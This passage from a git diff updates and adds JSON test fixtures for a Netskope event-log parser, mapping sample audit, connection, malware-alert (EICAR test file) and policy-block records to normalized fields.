\"unknown\",\n \"count\": 1,\n \"_id\": \"acfa7348-64c5-40de-b28d-202c8362d0f7\",\n \"userPrincipalName\": \"\",\n \"sAMAccountName\": \"\"\n}\n", "event": { + "action": "Allow", "category": [ "configuration" ], diff --git a/Netskope/netskope_events/tests/test_audit_log_edit_admin_record.json b/Netskope/netskope_events/tests/test_audit_log_edit_admin_record.json index 79f08033a..10b406a5f 100644 --- a/Netskope/netskope_events/tests/test_audit_log_edit_admin_record.json +++ b/Netskope/netskope_events/tests/test_audit_log_edit_admin_record.json 
@@ -5,6 +5,7 @@ "expected": { "message": "{\n \"timestamp\": 1651489787,\n \"type\": \"admin_audit_logs\",\n \"user\": \"john.doe@example.org\",\n \"severity_level\": 1,\n \"audit_log_event\": \"Edit admin record\",\n \"supporting_data\": {\n \"data_type\": \"admin\",\n \"data_values\": [\n \"admin@example.org\"\n ]\n },\n \"organization_unit\": \"\",\n \"ur_normalized\": \"john.doe@example.org\",\n \"ccl\": \"unknown\",\n \"count\": 1,\n \"_id\": \"275a263c8f8d4b7d9e12bf65b9094116\",\n \"userPrincipalName\": \"\",\n \"sAMAccountName\": \"\"\n}\n", "event": { + "action": "Allow", "category": [ "configuration" ], diff --git a/Netskope/netskope_events/tests/test_audit_log_login_failed.json b/Netskope/netskope_events/tests/test_audit_log_login_failed.json index 8a05a5c15..8a792a408 100644 --- a/Netskope/netskope_events/tests/test_audit_log_login_failed.json +++ b/Netskope/netskope_events/tests/test_audit_log_login_failed.json @@ -5,6 +5,7 @@ "expected": { "message": "{\n \"timestamp\": 1651494031,\n \"type\": \"admin_audit_logs\",\n \"user\": \"student13\",\n \"severity_level\": 1,\n \"audit_log_event\": \"Login Failed\",\n \"supporting_data\": {\n \"data_type\": \"user\",\n \"data_values\": [\n \"4.5.6.7\",\n \"student13\"\n ]\n },\n \"organization_unit\": \"\",\n \"ur_normalized\": \"student13\",\n \"ccl\": \"unknown\",\n \"count\": 1,\n \"_id\": \"60d81a80b26149b8a910dfffc48cbf41\",\n \"userPrincipalName\": \"\",\n \"sAMAccountName\": \"\"\n}\n", "event": { + "action": "Allow", "category": [ "authentication" ], diff --git a/Netskope/netskope_events/tests/test_audit_log_login_successful.json b/Netskope/netskope_events/tests/test_audit_log_login_successful.json index 1b4d67977..01549d366 100644 --- a/Netskope/netskope_events/tests/test_audit_log_login_successful.json +++ b/Netskope/netskope_events/tests/test_audit_log_login_successful.json 
@@ -5,6 +5,7 @@ "expected": { "message": "{\n \"timestamp\": 1671727087,\n \"type\": \"admin_audit_logs\",\n \"user\": \"john.doe@example.org\",\n \"severity_level\": 2,\n \"audit_log_event\": \"Login Successful\",\n \"supporting_data\": {\n \"data_type\": \"user\",\n \"data_values\": [\n \"1.2.3.4\",\n \"john.doe@example.org\"\n ]\n },\n \"organization_unit\": \"\",\n \"ur_normalized\": \"john.doe@example.org\",\n \"ccl\": \"unknown\",\n \"count\": 1,\n \"_id\": \"45b78fd638944e9ca0c6d92dfe2d4815\",\n \"userPrincipalName\": \"\",\n \"sAMAccountName\": \"\"\n}\n", "event": { + "action": "Allow", "category": [ "authentication" ], diff --git a/Netskope/netskope_events/tests/test_audit_log_logout_successful.json b/Netskope/netskope_events/tests/test_audit_log_logout_successful.json index 8b4635920..12e39be95 100644 --- a/Netskope/netskope_events/tests/test_audit_log_logout_successful.json +++ b/Netskope/netskope_events/tests/test_audit_log_logout_successful.json @@ -5,6 +5,7 @@ "expected": { "message": "{\n \"timestamp\": 1670409967,\n \"type\": \"admin_audit_logs\",\n \"user\": \"john.doe@example.org\",\n \"severity_level\": 2,\n \"audit_log_event\": \"Logout Successful\",\n \"supporting_data\": {\n \"data_type\": \"reason\",\n \"data_values\": [\n \"Logged out due to inactivity\"\n ]\n },\n \"organization_unit\": \"\",\n \"ur_normalized\": \"john.doe@example.org\",\n \"ccl\": \"unknown\",\n \"count\": 1,\n \"_id\": \"e0272abae25442f681d0dbbef65b67e9\",\n \"userPrincipalName\": \"\",\n \"sAMAccountName\": \"\"\n}\n", "event": { + "action": "Allow", "category": [ "authentication" ], diff --git a/Netskope/netskope_events/tests/test_audit_log_password_change_successful.json b/Netskope/netskope_events/tests/test_audit_log_password_change_successful.json index b06db05ac..a2fa885de 100644 --- a/Netskope/netskope_events/tests/test_audit_log_password_change_successful.json +++ b/Netskope/netskope_events/tests/test_audit_log_password_change_successful.json 
@@ -5,6 +5,7 @@ "expected": { "message": "{\n \"timestamp\": 1651489787,\n \"type\": \"admin_audit_logs\",\n \"user\": \"john.doe@example.org\",\n \"severity_level\": 1,\n \"audit_log_event\": \"Password Change Successful\",\n \"supporting_data\": {\n \"data_type\": \"user\",\n \"data_values\": [\n \"1.2.3.4\",\n \"admin@example.org\"\n ]\n },\n \"organization_unit\": \"\",\n \"ur_normalized\": \"john.doe@example.org\",\n \"ccl\": \"unknown\",\n \"count\": 1,\n \"_id\": \"47e7e59a6ffa4662be63836a0f898b16\",\n \"userPrincipalName\": \"\",\n \"sAMAccountName\": \"\"\n}\n", "event": { + "action": "Allow", "category": [ "iam" ], diff --git a/Netskope/netskope_events/tests/test_connection_log.json b/Netskope/netskope_events/tests/test_connection_log.json index 29f3c0723..5c5218356 100644 --- a/Netskope/netskope_events/tests/test_connection_log.json +++ b/Netskope/netskope_events/tests/test_connection_log.json 
@@ -5,6 +5,7 @@
"expected": {
"message": "{\n \"_id\": \"69573873d4de0a4f1d2cbac4\",\n \"access_method\": \"Client\",\n \"app\": \"Swile\",\n \"appcategory\": \"HR\",\n \"bypass_reason\": \"SSL Do Not Decrypt Bypass Policy Matched\",\n \"bypass_traffic\": \"yes\",\n \"category\": \"HR\",\n \"cci\": 16,\n \"ccl\": \"poor\",\n \"connection_id\": 0,\n \"count\": 1,\n \"domain\": \"test.example.org\",\n \"dst_country\": \"FR\",\n \"dst_geoip_src\": 1,\n \"dst_latitude\": 48.85836410522461,\n \"dst_location\": \"Paris\",\n \"dst_longitude\": 2.294532060623169,\n \"dst_region\": \"Ile-de-France\",\n \"dst_timezone\": \"Europe/Paris\",\n \"dst_zipcode\": \"N/A\",\n \"dstip\": \"5.6.7.8\",\n \"dstport\": 443,\n \"netskope_pop\": \"FR-PAR1\",\n \"organization_unit\": \"\",\n \"other_categories\": [\n \"Finance/Accounting\",\n \"All Categories\",\n \"HR\"\n ],\n \"page\": \"test.example.org\",\n \"policy\": \"bypass_ssl for regulation purpose\",\n \"request_id\": 1111111111111111111,\n \"site\": \"Swile\",\n \"src_country\": \"FR\",\n \"src_geoip_src\": 2,\n \"src_latitude\": 48.11,\n \"src_location\": \"Rennes\",\n \"src_longitude\": -1.6744,\n \"src_region\": \"Brittany\",\n \"src_time\": \"Wed Dec 21 17:12:00 2022\",\n \"src_timezone\": \"Europe/Paris\",\n \"src_zipcode\": \"35000\",\n \"srcip\": \"4.5.6.7\",\n \"ssl_decrypt_policy\": \"yes\",\n \"timestamp\": 1671639140,\n \"traffic_type\": \"CloudApp\",\n \"transaction_id\": 0,\n \"type\": \"connection\",\n \"ur_normalized\": \"john.doe@example.org\",\n \"url\": \"test.example.org\",\n \"user\": \"john.doe@example.org\",\n \"user_generated\": \"yes\",\n \"userip\": \"1.2.3.4\",\n \"userkey\": \"john.doe@example.org\",\n \"org\": \"\",\n \"http_transaction_count\": 0,\n \"network\": \"\",\n \"useragent\": \"\",\n \"dsthost\": \"\",\n \"numbytes\": 0,\n \"CononicalName\": \"\",\n \"os_version\": \"\",\n \"browser_session_id\": 0,\n \"resp_cnt\": 0,\n \"log_file_name\": \"\",\n \"suppression_end_time\": 0,\n \"browser_version\": \"\",\n \"severity\": \"\",\n \"client_bytes\": 0,\n \"suppression_start_time\": 0,\n \"app_session_id\": 0,\n \"sAMAccountName\": \"\",\n \"req_cnt\": 0,\n \"device\": \"\",\n \"browser\": \"\",\n \"userPrincipalName\": \"\",\n \"conn_endtime\": 1671639139,\n \"conn_duration\": 3,\n \"protocol\": \"\",\n \"fromlogs\": \"\",\n \"serial\": \"\",\n \"resp_content_len\": 0,\n \"dynamic_classification\": \"\",\n \"hostname\": \"\",\n \"os\": \"\",\n \"server_bytes\": 0,\n \"conn_starttime\": 1671639136,\n \"sessionid\": \"\",\n \"resp_content_type\": \"\"\n}\n",
"event": {
+ "action": "Allow",
"category": [
"network"
],
diff --git a/Netskope/netskope_events/tests/test_dlp_incident.json b/Netskope/netskope_events/tests/test_dlp_incident.json
index 66c901c90..37ab6e32b 100644
--- a/Netskope/netskope_events/tests/test_dlp_incident.json
+++ b/Netskope/netskope_events/tests/test_dlp_incident.json
@@ -30,7 +30,8 @@
"hash": {
"md5": "68b329da9893e34099c7d8ad5cb9c940"
},
- "mime_type": "eicar.txt"
+ "mime_type": "eicar.txt",
+ "size": 19154
},
"http": {
"request": {
diff --git a/Netskope/netskope_events/tests/test_malware_alert.json b/Netskope/netskope_events/tests/test_malware_alert.json
index 63497504d..5e5f6de15 100644
--- a/Netskope/netskope_events/tests/test_malware_alert.json
+++ b/Netskope/netskope_events/tests/test_malware_alert.json
@@ -5,7 +5,7 @@ "expected": { "message": "{\n \"_id\": \"882049056ee9e069c1c329b7\",\n \"access_method\": \"Client\",\n \"action\": \"Detection\",\n \"activity\": \"Download\",\n \"alert\": \"yes\",\n \"alert_type\": \"Malware\",\n \"app\": \"eicar\",\n \"app_session_id\": 111111111111111111,\n \"appcategory\": \"n/a\",\n \"browser\": \"Safari\",\n \"category\": \"n/a\",\n \"cci\": \"\",\n \"ccl\": \"unknown\",\n \"connection_id\": 0,\n \"count\": 1,\n \"device\": \"Mac Device\",\n \"dst_country\": \"US\",\n \"dst_geoip_src\": 2,\n \"dst_latitude\": 47.6711,\n \"dst_location\": \"Redmond\",\n \"dst_longitude\": -122.1253,\n \"dst_region\": \"Washington\",\n \"dst_timezone\": \"America/Los_Angeles\",\n \"dst_zipcode\": \"98073\",\n \"dstip\": \"5.6.7.8\",\n \"file_path\": \"NA\",\n \"file_size\": 308,\n \"file_type\": \"File Type Not Detected\",\n \"hostname\": \"MacBook Pro\",\n \"instance\": null,\n \"managementID\": \"99999999999999999999999999999999\",\n \"md5\": \"68b329da9893e34099c7d8ad5cb9c940\",\n \"mime_type\": \"\",\n \"nsdeviceuid\": \"BC848089-186A-4F2D-A26F-E5CC94C29E56\",\n \"object\": \"eicarcom2.zip\",\n \"object_id\": \"68b329da9893e34099c7d8ad5cb9c940\",\n \"object_type\": \"File\",\n \"organization_unit\": \"\",\n \"os\": \"Monterey\",\n \"referer\": \"https://www.eicar.org/\",\n \"request_id\": 2222222222222222222,\n \"severity\": \"high\",\n \"site\": \"eicar\",\n \"src_country\": \"FR\",\n \"src_geoip_src\": 2,\n \"src_latitude\": 48.11,\n \"src_location\": \"Rennes\",\n \"src_longitude\": -1.6744,\n \"src_region\": \"Brittany\",\n \"src_timezone\": \"Europe/Paris\",\n \"src_zipcode\": \"35000\",\n \"srcip\": \"4.3.2.1\",\n \"timestamp\": 1671631928,\n \"title\": \"eicarcom2.zip\",\n \"traffic_type\": \"CloudApp\",\n \"transaction_id\": 3333333333333333333,\n \"tss_mode\": \"inline\",\n \"type\": \"nspolicy\",\n \"ur_normalized\": \"john.doe@example.org\",\n \"url\": \"secure.eicar.org/eicarcom2.zip\",\n \"user\": \"john.doe@example.org\",\n 
\"user_id\": \"john.doe@example.org\",\n \"userip\": \"1.2.3.4\",\n \"userkey\": \"john.doe@example.org\",\n \"dlp_file\": \"\",\n \"data_center\": \"\",\n \"browser_version\": \"\",\n \"owner\": \"\",\n \"dlp_incident_id\": 0,\n \"channel_id\": \"\",\n \"from_user_category\": \"\",\n \"resp_cnt\": 0,\n \"suppression_key\": \"\",\n \"loginurl\": \"\",\n \"total_collaborator_count\": 0,\n \"os_version\": \"\",\n \"dlp_rule\": \"\",\n \"dlp_mail_parent_id\": \"\",\n \"instance_id\": \"\",\n \"to_user\": \"\",\n \"suppression_end_time\": 0,\n \"fromlogs\": \"\",\n \"dlp_parent_id\": 0,\n \"dstport\": 0,\n \"dst_timezone\": \"\",\n \"serial\": \"\",\n \"audit_category\": \"\",\n \"sha256\": \"\",\n \"from_user\": \"\",\n \"sAMAccountName\": \"\",\n \"app_activity\": \"\",\n \"useragent\": \"\",\n \"netskope_activity\": \"\",\n \"conn_duration\": 0,\n \"other_categories\": [],\n \"custom_connector\": \"\",\n \"dlp_rule_severity\": \"\",\n \"numbytes\": 0,\n \"telemetry_app\": \"\",\n \"true_obj_category\": \"\",\n \"userPrincipalName\": \"\",\n \"logintype\": \"\",\n \"suppression_start_time\": 0,\n \"browser_session_id\": 0,\n \"dlp_profile\": \"\",\n \"src_time\": \"\",\n \"modified\": 0,\n \"policy\": \"\",\n \"policy_id\": \"\",\n \"notify_template\": \"\",\n \"audit_type\": \"\",\n \"orignal_file_path\": \"\",\n \"dlp_is_unique_count\": \"\",\n \"org\": \"\",\n \"user_category\": \"\",\n \"dlp_unique_count\": 0,\n \"exposure\": \"\",\n \"netskope_pop\": \"\",\n \"shared_with\": \"\",\n \"client_bytes\": 0,\n \"sanctioned_instance\": \"\",\n \"device_classification\": \"\",\n \"data_type\": \"\",\n \"scan_type\": \"\",\n \"internal_collaborator_count\": 0,\n \"CononicalName\": \"\",\n \"workspace\": \"\",\n \"log_file_name\": \"\",\n \"parent_id\": \"\",\n \"true_obj_type\": \"\",\n \"dlp_rule_count\": 0,\n \"sessionid\": \"\",\n \"workspace_id\": \"\",\n \"page_site\": \"\",\n \"universal_connector\": \"\",\n \"server_bytes\": 0,\n \"req_cnt\": 0,\n \"file_lang\": 
\"\",\n \"protocol\": \"\",\n \"web_universal_connector\": \"\",\n \"dsthost\": \"\",\n \"appsuite\": \"\",\n \"managed_app\": \"\",\n \"page\": \"\"\n}\n", "event": { - "action": "Download", + "action": "Detection", "category": [ "malware" ], @@ -36,7 +36,8 @@ "hash": { "md5": "68b329da9893e34099c7d8ad5cb9c940" }, - "name": "eicarcom2.zip" + "name": "eicarcom2.zip", + "size": 308 }, "host": { "name": "MacBook Pro", diff --git a/Netskope/netskope_events/tests/test_nspolicy_block.json b/Netskope/netskope_events/tests/test_nspolicy_block.json new file mode 100644 index 000000000..0d739d4fd --- /dev/null +++ b/Netskope/netskope_events/tests/test_nspolicy_block.json 
@@ -0,0 +1,109 @@ +{ + "input": { + "message": "{\"_id\":\"55093de1d7b4571d8941f492\",\"access_method\":\"Client\",\"action\":\"block\",\"activity\":\"Browse\",\"alert\":\"yes\",\"app\":\"DNS Over HTTPS\",\"app_session_id\":1234567890,\"appcategory\":\"General\",\"browser\":\"Chrome\",\"browser_session_id\":2222222222222,\"category\":\"General\",\"cci\":\"\",\"ccl\":\"unknown\",\"connection_id\":0,\"count\":1,\"device\":\"Windows Device\",\"device_classification\":\"unmanaged\",\"dst_country\":\"US\",\"dst_latitude\":37.775699615478516,\"dst_location\":\"San Francisco\",\"dst_longitude\":-122.39520263671875,\"dst_region\":\"California\",\"dst_timezone\":\"America/Los_Angeles\",\"dst_zipcode\":\"N/A\",\"dstip\":\"1.2.3.4\",\"dstport\":443,\"hostname\":\"PC-HOST01\",\"ja3\":\"1234567890abcdef1234567890abcdef\",\"ja3s\":\"NotAvailable\",\"managed_app\":\"no\",\"netskope_pop\":\"FR-PAR2\",\"notify_template\":\"silent_block.html\",\"organization_unit\":\"\",\"os\":\"Windows 11\",\"os_version\":\"Windows NT 11.0\",\"other_categories\":[\"Technology\",\"General\"],\"page\":\"test.example.com\",\"page_site\":\"test\",\"policy\":\"Block DoH - incompatibility with Netskope\",\"policy_id\":\"99999999999999999999999999999999 2024-10-30 13:52:18.401518\",\"protocol\":\"HTTPS/1.1\",\"request_id\":444444444444444444,\"severity\":\"unknown\",\"site\":\"DOH\",\"src_country\":\"FR\",\"src_latitude\":48.8323,\"src_location\":\"Paris\",\"src_longitude\":2.4075,\"src_region\":\"\u00cele-de-France\",\"src_time\":\"Thu Nov 14 10:01:00 
2024\",\"src_timezone\":\"Europe/Paris\",\"src_zipcode\":\"75018\",\"srcip\":\"5.6.7.8\",\"telemetry_app\":\"\",\"timestamp\":1731574892,\"traffic_type\":\"CloudApp\",\"transaction_id\":111111111111,\"type\":\"nspolicy\",\"ur_normalized\":\"john.doe@mail.fr\",\"url\":\"test.example.com\",\"user\":\"john.doe@mail.fr\",\"useragent\":\"Chrome\",\"userip\":\"10.20.30.40\",\"userkey\":\"john.doe@mail.fr\",\"log_file_name\":\"\",\"from_user\":\"\",\"ext_labels\":[],\"audit_type\":\"\",\"CononicalName\":\"\",\"parent_id\":\"\",\"tss_scan_failed\":\"\",\"data_center\":\"\",\"from_user_category\":\"\",\"internal_collaborator_count\":0,\"dlp_rule_severity\":\"\",\"req_cnt\":0,\"dlp_parent_id\":0,\"alert_type\":\"\",\"workspace\":\"\",\"dst_geoip_src\":0,\"user_category\":\"\",\"channel_id\":\"\",\"loginurl\":\"\",\"dlp_is_unique_count\":\"\",\"netskope_activity\":\"\",\"retro_scan_name\":\"\",\"to_user\":\"\",\"sha256\":\"\",\"justification_type\":\"\",\"fromlogs\":\"\",\"title\":\"\",\"universal_connector\":\"\",\"custom_connector\":\"\",\"modified\":0,\"user_confidence_index\":0,\"exposure\":\"\",\"orignal_file_path\":\"\",\"instance_id\":\"\",\"managementID\":\"\",\"sanctioned_instance\":\"\",\"file_lang\":\"\",\"dlp_scan_failed\":\"\",\"mime_type\":\"\",\"browser_version\":\"\",\"object_id\":\"\",\"data_type\":\"\",\"audit_category\":\"\",\"dlp_mail_parent_id\":\"\",\"file_path\":\"\",\"sAMAccountName\":\"\",\"client_bytes\":0,\"dlp_file\":\"\",\"org\":\"\",\"numbytes\":0,\"tss_fail_reason\":\"\",\"object\":\"\",\"nsdeviceuid\":\"\",\"app_activity\":\"\",\"instance\":\"\",\"userPrincipalName\":\"\",\"object_type\":\"\",\"scan_type\":\"\",\"appsuite\":\"\",\"conn_duration\":0,\"file_type\":\"\",\"dsthost\":\"\",\"logintype\":\"\",\"true_obj_type\":\"\",\"dlp_rule\":\"\",\"serial\":\"\",\"suppression_key\":\"\",\"suppression_start_time\":0,\"dlp_rule_count\":0,\"shared_with\":\"\",\"resp_cnt\":0,\"justification_reason\":\"\",\"web_universal_connector\":\"\",\"server_bytes\"
:0,\"dlp_unique_count\":0,\"md5\":\"\",\"file_size\":0,\"smtp_to\":[],\"dlp_incident_id\":0,\"true_obj_category\":\"\",\"src_geoip_src\":0,\"total_collaborator_count\":0,\"sessionid\":\"\",\"user_id\":\"\",\"custom_attr\":{},\"referer\":\"\",\"suppression_end_time\":0,\"owner\":\"\",\"tss_mode\":\"\",\"dlp_fail_reason\":\"\",\"workspace_id\":\"\",\"dlp_profile\":\"\"}", + "sekoiaio": { + "intake": { + "dialect": "Netskope", + "dialect_uuid": "de9ca004-991e-4f5c-89c5-e075f3fb3216" + } + } + }, + "expected": { + "message": "{\"_id\":\"55093de1d7b4571d8941f492\",\"access_method\":\"Client\",\"action\":\"block\",\"activity\":\"Browse\",\"alert\":\"yes\",\"app\":\"DNS Over HTTPS\",\"app_session_id\":1234567890,\"appcategory\":\"General\",\"browser\":\"Chrome\",\"browser_session_id\":2222222222222,\"category\":\"General\",\"cci\":\"\",\"ccl\":\"unknown\",\"connection_id\":0,\"count\":1,\"device\":\"Windows Device\",\"device_classification\":\"unmanaged\",\"dst_country\":\"US\",\"dst_latitude\":37.775699615478516,\"dst_location\":\"San Francisco\",\"dst_longitude\":-122.39520263671875,\"dst_region\":\"California\",\"dst_timezone\":\"America/Los_Angeles\",\"dst_zipcode\":\"N/A\",\"dstip\":\"1.2.3.4\",\"dstport\":443,\"hostname\":\"PC-HOST01\",\"ja3\":\"1234567890abcdef1234567890abcdef\",\"ja3s\":\"NotAvailable\",\"managed_app\":\"no\",\"netskope_pop\":\"FR-PAR2\",\"notify_template\":\"silent_block.html\",\"organization_unit\":\"\",\"os\":\"Windows 11\",\"os_version\":\"Windows NT 11.0\",\"other_categories\":[\"Technology\",\"General\"],\"page\":\"test.example.com\",\"page_site\":\"test\",\"policy\":\"Block DoH - incompatibility with Netskope\",\"policy_id\":\"99999999999999999999999999999999 2024-10-30 
13:52:18.401518\",\"protocol\":\"HTTPS/1.1\",\"request_id\":444444444444444444,\"severity\":\"unknown\",\"site\":\"DOH\",\"src_country\":\"FR\",\"src_latitude\":48.8323,\"src_location\":\"Paris\",\"src_longitude\":2.4075,\"src_region\":\"\u00cele-de-France\",\"src_time\":\"Thu Nov 14 10:01:00 2024\",\"src_timezone\":\"Europe/Paris\",\"src_zipcode\":\"75018\",\"srcip\":\"5.6.7.8\",\"telemetry_app\":\"\",\"timestamp\":1731574892,\"traffic_type\":\"CloudApp\",\"transaction_id\":111111111111,\"type\":\"nspolicy\",\"ur_normalized\":\"john.doe@mail.fr\",\"url\":\"test.example.com\",\"user\":\"john.doe@mail.fr\",\"useragent\":\"Chrome\",\"userip\":\"10.20.30.40\",\"userkey\":\"john.doe@mail.fr\",\"log_file_name\":\"\",\"from_user\":\"\",\"ext_labels\":[],\"audit_type\":\"\",\"CononicalName\":\"\",\"parent_id\":\"\",\"tss_scan_failed\":\"\",\"data_center\":\"\",\"from_user_category\":\"\",\"internal_collaborator_count\":0,\"dlp_rule_severity\":\"\",\"req_cnt\":0,\"dlp_parent_id\":0,\"alert_type\":\"\",\"workspace\":\"\",\"dst_geoip_src\":0,\"user_category\":\"\",\"channel_id\":\"\",\"loginurl\":\"\",\"dlp_is_unique_count\":\"\",\"netskope_activity\":\"\",\"retro_scan_name\":\"\",\"to_user\":\"\",\"sha256\":\"\",\"justification_type\":\"\",\"fromlogs\":\"\",\"title\":\"\",\"universal_connector\":\"\",\"custom_connector\":\"\",\"modified\":0,\"user_confidence_index\":0,\"exposure\":\"\",\"orignal_file_path\":\"\",\"instance_id\":\"\",\"managementID\":\"\",\"sanctioned_instance\":\"\",\"file_lang\":\"\",\"dlp_scan_failed\":\"\",\"mime_type\":\"\",\"browser_version\":\"\",\"object_id\":\"\",\"data_type\":\"\",\"audit_category\":\"\",\"dlp_mail_parent_id\":\"\",\"file_path\":\"\",\"sAMAccountName\":\"\",\"client_bytes\":0,\"dlp_file\":\"\",\"org\":\"\",\"numbytes\":0,\"tss_fail_reason\":\"\",\"object\":\"\",\"nsdeviceuid\":\"\",\"app_activity\":\"\",\"instance\":\"\",\"userPrincipalName\":\"\",\"object_type\":\"\",\"scan_type\":\"\",\"appsuite\":\"\",\"conn_duration\":0,\"file_t
ype\":\"\",\"dsthost\":\"\",\"logintype\":\"\",\"true_obj_type\":\"\",\"dlp_rule\":\"\",\"serial\":\"\",\"suppression_key\":\"\",\"suppression_start_time\":0,\"dlp_rule_count\":0,\"shared_with\":\"\",\"resp_cnt\":0,\"justification_reason\":\"\",\"web_universal_connector\":\"\",\"server_bytes\":0,\"dlp_unique_count\":0,\"md5\":\"\",\"file_size\":0,\"smtp_to\":[],\"dlp_incident_id\":0,\"true_obj_category\":\"\",\"src_geoip_src\":0,\"total_collaborator_count\":0,\"sessionid\":\"\",\"user_id\":\"\",\"custom_attr\":{},\"referer\":\"\",\"suppression_end_time\":0,\"owner\":\"\",\"tss_mode\":\"\",\"dlp_fail_reason\":\"\",\"workspace_id\":\"\",\"dlp_profile\":\"\"}", + "event": { + "action": "block", + "category": [ + "network" + ], + "dataset": "nspolicy", + "duration": 0, + "kind": "alert", + "type": [ + "info" + ] + }, + "@timestamp": "2024-11-14T09:01:32Z", + "destination": { + "address": "1.2.3.4", + "bytes": 0, + "geo": { + "city_name": "San Francisco", + "country_iso_code": "US", + "location": { + "lat": 37.775699615478516, + "lon": -122.39520263671875 + }, + "postal_code": "N/A", + "region_name": "California", + "timezone": "America/Los_Angeles" + }, + "ip": "1.2.3.4" + }, + "host": { + "name": "PC-HOST01", + "os": { + "name": "Windows 11", + "platform": "windows", + "type": "windows", + "version": "Windows NT 11.0" + } + }, + "netskope": { + "events": { + "access_method": "Client", + "application": { + "category": "General", + "name": "DNS Over HTTPS" + }, + "ccl": "unknown" + } + }, + "network": { + "bytes": 0 + }, + "observer": { + "vendor": "Netskope" + }, + "related": { + "ip": [ + "1.2.3.4", + "5.6.7.8" + ], + "user": [ + "john.doe" + ] + }, + "rule": { + "id": "99999999999999999999999999999999 2024-10-30 13:52:18.401518", + "name": "Block DoH - incompatibility with Netskope" + }, + "source": { + "address": "5.6.7.8", + "bytes": 0, + "geo": { + "city_name": "Paris", + "country_iso_code": "FR", + "location": { + "lat": 48.8323, + "lon": 2.4075 + }, + 
"postal_code": "75018", + "region_name": "\u00cele-de-France", + "timezone": "Europe/Paris" + }, + "ip": "5.6.7.8" + }, + "url": { + "original": "test.example.com", + "path": "test.example.com" + }, + "user": { + "domain": "mail.fr", + "email": "john.doe@mail.fr", + "name": "john.doe" + }, + "user_agent": { + "name": "Chrome" + } + } +} \ No newline at end of file diff --git a/Netskope/netskope_events/tests/test_nspolicy_log.json b/Netskope/netskope_events/tests/test_nspolicy_log.json index 25513a172..d0d9ed304 100644 --- a/Netskope/netskope_events/tests/test_nspolicy_log.json +++ b/Netskope/netskope_events/tests/test_nspolicy_log.json @@ -43,7 +43,8 @@ "md5": "68b329da9893e34099c7d8ad5cb9c940" }, "mime_type": "image/gif", - "name": "giphy2.gif" + "name": "giphy2.gif", + "size": 204299 }, "host": { "name": "TEST-1111111", diff --git a/Netskope/netskope_events/tests/test_nspolicy_upload.json b/Netskope/netskope_events/tests/test_nspolicy_upload.json new file mode 100644 index 000000000..b05f61a9d --- /dev/null +++ b/Netskope/netskope_events/tests/test_nspolicy_upload.json 
@@ -0,0 +1,120 @@ +{ + "input": { + "message": "{\"_id\":\"2d7a3c19cf913179146454b6\",\"access_method\":\"Client\",\"activity\":\"Upload\",\"alert\":\"no\",\"app\":\"App\",\"app_session_id\":1234567890,\"appcategory\":\"Remote Access\",\"browser\":\"CHROME\",\"browser_session_id\":1111111111111111111,\"browser_version\":\"6.0;\",\"category\":\"Remote Access\",\"cci\":73,\"ccl\":\"medium\",\"connection_id\":0,\"count\":1,\"data_type\":\"application/octet-stream\",\"device\":\"Windows Device\",\"device_classification\":\"managed\",\"dst_country\":\"CZ\",\"dst_latitude\":50.0883,\"dst_location\":\"Prague\",\"dst_longitude\":14.4124,\"dst_region\":\"Prague\",\"dst_timezone\":\"Europe/Prague\",\"dst_zipcode\":\"110 00\",\"dstip\":\"1.2.3.4\",\"dstport\":80,\"file_size\":24,\"file_type\":\"File Type Not Detected\",\"hostname\":\"PC-HOST01\",\"ja3\":\"NotAvailable\",\"ja3s\":\"NotAvailable\",\"managed_app\":\"no\",\"md5\":\"68b329da9893e34099c7d8ad5cb9c940\",\"netskope_pop\":\"FR-PAR3\",\"object\":\"object.txt\",\"object_type\":\"File\",\"organization_unit\":\"\",\"os\":\"Windows 10\",\"os_version\":\"Windows NT 10.0\",\"other_categories\":[\"Remote Access\"],\"page\":\"test.example.com\",\"page_site\":\"app\",\"policy_id\":\"22222222222222222222222222222222 2024-10-30 13:52:18.401518\",\"protocol\":\"HTTPS/1.1\",\"request_id\":4444444444444444444,\"severity\":\"unknown\",\"site\":\"App\",\"src_country\":\"FR\",\"src_latitude\":48.6673,\"src_location\":\"Paris\",\"src_longitude\":2.3476,\"src_region\":\"\u00cele-de-France\",\"src_time\":\"Thu Nov 14 10:04:00 2024\",\"src_timezone\":\"Europe/Paris\",\"src_zipcode\":\"75001\",\"srcip\":\"5.6.7.8\",\"telemetry_app\":\"\",\"timestamp\":1731575086,\"traffic_type\":\"CloudApp\",\"transaction_id\":5555555555555555555,\"type\":\"nspolicy\",\"universal_connector\":\"yes\",\"ur_normalized\":\"jdoe@mail.com\",\"url\":\"url.app.com/object2.txt\",\"user\":\"JDOE@mail.com\",\"useragent\":\"Mozilla/4.0 (compatible; CHROME 6.0; 
DynGate)\",\"userip\":\"10.20.30.40\",\"userkey\":\"JDOE@mail.com\",\"serial\":\"\",\"numbytes\":0,\"exposure\":\"\",\"server_bytes\":0,\"web_universal_connector\":\"\",\"logintype\":\"\",\"alert_type\":\"\",\"from_user\":\"\",\"dlp_scan_failed\":\"\",\"dlp_rule\":\"\",\"fromlogs\":\"\",\"justification_type\":\"\",\"tss_mode\":\"\",\"user_category\":\"\",\"src_geoip_src\":0,\"CononicalName\":\"\",\"shared_with\":\"\",\"channel_id\":\"\",\"dlp_mail_parent_id\":\"\",\"custom_attr\":{},\"sha256\":\"\",\"resp_cnt\":0,\"custom_connector\":\"\",\"orignal_file_path\":\"\",\"to_user\":\"\",\"internal_collaborator_count\":0,\"owner\":\"\",\"appsuite\":\"\",\"org\":\"\",\"dsthost\":\"\",\"tss_fail_reason\":\"\",\"audit_type\":\"\",\"parent_id\":\"\",\"data_center\":\"\",\"loginurl\":\"\",\"mime_type\":\"\",\"from_user_category\":\"\",\"file_path\":\"\",\"modified\":0,\"referer\":\"\",\"dlp_profile\":\"\",\"object_id\":\"\",\"true_obj_type\":\"\",\"tss_scan_failed\":\"\",\"managementID\":\"\",\"dst_geoip_src\":0,\"dlp_rule_severity\":\"\",\"conn_duration\":0,\"policy\":\"\",\"netskope_activity\":\"\",\"audit_category\":\"\",\"smtp_to\":[],\"nsdeviceuid\":\"\",\"justification_reason\":\"\",\"suppression_start_time\":0,\"dlp_is_unique_count\":\"\",\"dlp_parent_id\":0,\"dlp_fail_reason\":\"\",\"userPrincipalName\":\"\",\"dlp_file\":\"\",\"dlp_incident_id\":0,\"sanctioned_instance\":\"\",\"suppression_key\":\"\",\"retro_scan_name\":\"\",\"instance_id\":\"\",\"true_obj_category\":\"\",\"action\":\"\",\"sessionid\":\"\",\"file_lang\":\"\",\"log_file_name\":\"\",\"notify_template\":\"\",\"sAMAccountName\":\"\",\"ext_labels\":[],\"inst